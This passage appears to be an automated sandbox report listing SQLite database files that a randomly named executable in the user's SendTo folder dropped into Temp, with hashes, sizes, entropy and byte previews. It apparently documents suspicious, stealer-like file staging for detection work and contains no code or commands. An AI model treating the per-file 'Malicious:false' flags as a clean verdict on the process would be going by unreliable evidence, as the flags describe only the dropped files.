                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\em97TfUVSa

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\fBtC3k8Gnv

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\fdGUKlB78t

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ftqBORJZ6x

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\fyEjvJDkm8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\fysZJNJ8in

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\gh6u6p57G8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\heeJGKlgB0

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\i3oQL7bmc8

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iH4RQgyHDS

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iSs7lkbyZg

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iTB2ee15IG

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iTRdW5zIWj

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iV0vwescVe

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\iV2bmz0GVi

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\ivG9UXz8uq

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\jPhOjPgrgb

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\k10NkdNMOd

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\kKb2lheJXb

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\kKpmYsgGyb

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\l5xx4SwjVK

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\l9JFYzHTae

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\lAeirWcJ2E

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\lGyohRsTwz

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
